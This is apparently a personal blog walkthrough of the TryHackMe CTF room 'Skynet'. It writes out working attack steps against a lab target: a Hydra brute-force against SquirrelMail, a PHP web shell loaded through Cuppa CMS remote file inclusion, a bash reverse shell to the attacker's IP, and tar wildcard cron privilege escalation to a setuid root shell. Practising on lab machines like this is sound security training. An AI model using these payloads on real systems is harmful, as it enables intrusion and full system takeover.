s1gn 1n subscr1b3

Getting Back Into the Flow: A Full Walkthrough of "Skynet"

Getting Back Into the Flow: A Full Walkthrough of "Skynet"

I haven’t touched TryHackMe or done any structured CTF work in quite a while, so I figured it was time to slowly get back into the game. I didn’t want to burn out immediately by picking some complex, frustration-heavy box, so I went looking for something familiar, linear, and ideally quick - and stumbled upon "Skynet."

The room sounded manageable and looked like a decent way to re-familiarize myself with some core techniques: enumeration, web fuzzing, some Samba recon, basic web exploitation, and classic privilege escalation. Nothing groundbreaking, but definitely enough to get the gears turning again.

Recon and Enumeration

I always start with full port coverage, especially if I haven’t touched the target before. That meant a full TCP scan with service detection:

nmap -sV -sC -p- -T4 10.10.209.141

That gave me a bunch of open ports to chew on:

  • 22 (SSH)
  • 80 (HTTP)
  • 110 (POP3)
  • 143 (IMAP)
  • 139, 445 (Samba)

The presence of POP3 and IMAP already hinted that this was probably mail-related in some way. HTTP is always worth looking at first, so I browsed to http://10.10.209.141 and landed on a custom Skynet-themed search engine. I ran Gobuster on it right away to dig deeper:

gobuster dir -u http://10.10.209.141/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

This yielded some interesting results, including /squirrelmail/ - a very dated-looking webmail client and a couple of other directories like /config, /admin, and /logs, though most of them were forbidden.

Samba Enumeration and Password Discovery

Before diving into the webmail interface, I decided to check what Samba had to offer. Using:

smbclient -L //10.10.209.141 -N

I found a share named anonymous. That typically means it's accessible without credentials, so I connected:

smbclient //10.10.209.141/anonymous -N

Inside that share, there were a few files, the one that stood out was attention.txt. It mentioned a recent system malfunction and stated that all Skynet employees needed to reset their passwords. The note was signed by "Miles Dyson," which seemed like a solid lead for a possible username.

Another file, log1.txt, contained what looked like a bunch of password guesses or attempts - all with some form of "terminator" in them. Here's a quick snippet of what was inside:

terminator22596
cyborg007haloterminator
exterminator95
terminator123!@#
...

Given I had a potential username (milesdyson) and what looked like a password list, I figured I’d try my luck logging into the /squirrelmail/ interface using just the browser.

Navigating to http://10.10.209.141/squirrelmail/, I landed on a basic login page. Inputting milesdyson as the username and cyborg007haloterminator as the password surprisingly worked on the first try, pure luck, but I wasn’t complaining.

For those who aren’t lucky or want to automate this step, you could always use Hydra:

hydra -l milesdyson -P passwords.txt 10.10.209.141 http-post-form \
"/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown user or password incorrect"

Once logged in, I could browse the inbox. A message titled "Samba Password reset" caught my attention. The body of the message revealed a newly generated Samba password:

)s{A&2Z=F^n_E.B

Armed with that updated password and the known username, I attempted to access the private milesdyson SMB share:

smbclient //10.10.209.141/milesdyson -U milesdyson

I entered the new password from the mail, and access was granted.

Finding the CMS Path

Exploring this share revealed a mix of PDFs and a notes/ folder. Inside notes/, a file named important.txt stood out. It contained this:

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

The first line was clearly a breadcrumb to a hidden directory on the web server. Visiting http://10.10.209.141/45kra24zxs28v3yd/ brought up a new admin interface. I ran Gobuster again:

gobuster dir -u http://10.10.209.141/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt -x php

It revealed:

/administrator/
/administrator/alerts/alertConfigField.php

That last file looked interesting. A quick search confirmed that it belonged to Cuppa CMS, and was vulnerable to Remote File Inclusion (RFI) via the urlConfig parameter.

I created a simple shell file on my attacker machine:

<?php system($_GET['cmd']); ?>

I hosted it with Python’s HTTP server:

python3 -m http.server 8000

Then I called it through the vulnerable URL like this:

curl "http://10.10.209.141/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.94.114:8000/shell.txt&cmd=id"

If everything worked, it would run the id command - and it did. I got back uid=33(www-data), confirming code execution.

Reverse Shell and Privilege Escalation

To take full control, I upgraded from command execution to a reverse shell. I created this payload:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.94.114/4444 0>&1'"); ?>

I again hosted it with Python and set up a listener:

nc -lvnp 4444

Triggered the same vulnerable URL, and after a moment, my netcat listener caught the reverse shell:

www-data@skynet:/$

Now I had an interactive shell on the box.

I grabbed the user flag from /home/milesdyson/user.txt, then started enumerating privilege escalation vectors. I ran:

sudo -l

But had no sudo permissions. I checked for interesting cron jobs with:

cat /etc/crontab

This revealed:

*/1 * * * * root /home/milesdyson/backups/backup.sh

And the script looked like this:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

Ah, the classic tar wildcard privilege escalation. I used the --checkpoint-action technique to run code as root:

echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > root_script.sh
chmod +x root_script.sh

touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh root_script.sh'

Waited a minute, and:

/tmp/rootbash -p
whoami
root

Root access was achieved. Final flag was located in /root/root.txt.

Conclusion

Skynet was the right mix of easy enumeration, a few logical steps, and an old-school privesc vector. While most of the room was pretty linear, it still required tying different pieces together, from SMB access to webmail, from leaked passwords to hidden paths and RFI abuse.

What made it a bit tedious was the technical side, I ran into a few issues with the THM interface crashing and having to reboot the target VM a couple of times, which delayed testing the cronjob exploit.

Still, a fun room. Definitely a nice way to return to CTFs and get back in shape.